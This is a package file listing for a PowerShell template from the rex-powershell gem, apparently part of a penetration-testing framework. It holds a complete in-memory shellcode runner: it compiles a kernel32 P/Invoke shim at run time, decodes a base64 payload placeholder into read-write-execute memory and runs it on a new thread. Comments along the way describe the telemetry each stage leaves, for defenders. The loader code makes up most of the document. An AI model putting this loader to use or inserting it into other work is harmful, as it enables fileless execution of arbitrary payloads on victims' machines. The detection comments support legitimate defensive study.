Sha256: d88140b06879e9faf4b79115039e7234cf94e277c5d2460dc731b470c847bad6

Contents?: true

Size: 1.94 KB

Versions: 27

Compression:

Stored size: 1.94 KB

Contents

# Template for an in-memory native-code runner: it compiles a small C# P/Invoke
# shim, decodes a base64 byte blob, copies it into executable memory and runs
# it on a new thread. Variable names, the namespace name and the blob are
# placeholders that are filled in when the template is rendered.
# Defender note: each stage below has a telemetry point - the script text
# itself (script block logging, AMSI), the run-time compile, the executable
# allocation and the thread start.
Set-StrictMode -Version 2
# C# source held in a here-string. It declares three kernel32.dll imports
# (VirtualAlloc, CreateThread, WaitForSingleObject) and the flag enums used
# below: Commit 0x1000, Reserve 0x2000, ExecuteReadWrite 0x40 and
# Infinite 0xFFFFFFFF.
$%{var_syscode} = @"
	using System;
	using System.Runtime.InteropServices;
	namespace %{var_kernel32} {
		public class func {
			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
		}
	}
"@

# Compile the C# source at run time through CodeDom. GenerateInMemory asks for
# the assembly to be loaded in memory instead of being saved as an output file.
# NOTE(review): the compiler results object is stored but its error collection
# is never inspected, so a failed compile only shows up later when the type is
# first referenced.
# Detection: on .NET Framework, CodeDom compilation normally starts csc.exe as
# a child of the PowerShell host; that parent/child pair is worth alerting on.
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})

# Decode the base64 placeholder into the byte array that will be executed.
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")

# Reserve and commit Length + 1 bytes with ExecuteReadWrite (0x40) protection;
# address 0 lets the system pick the location. Private read-write-execute
# memory inside a PowerShell process is a strong anomaly signal for EDR and
# memory forensics.
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
# A null pointer means the allocation failed: record result code 3 and stop.
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
# Copy the decoded bytes into the newly allocated region.
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
# Start a thread whose entry point is the copied buffer; the attributes, stack
# size, parameter, creation flags and thread-id pointer are all passed as zero.
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
# A null handle means thread creation failed: record result code 7 and stop.
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
# Block until that thread exits (infinite timeout); the wait's return value is
# stored but not used afterwards.
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

Version data entries

27 entries across 27 versions & 1 rubygems

Version Path
rex-powershell-0.1.91 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.90 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.89 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.88 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.87 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.86 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.85 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.84 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.83 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.82 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.81 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.80 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.79 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.78 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.77 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.76 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.75 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.74 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.73 data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.72 data/templates/to_mem_dotnet.ps1.template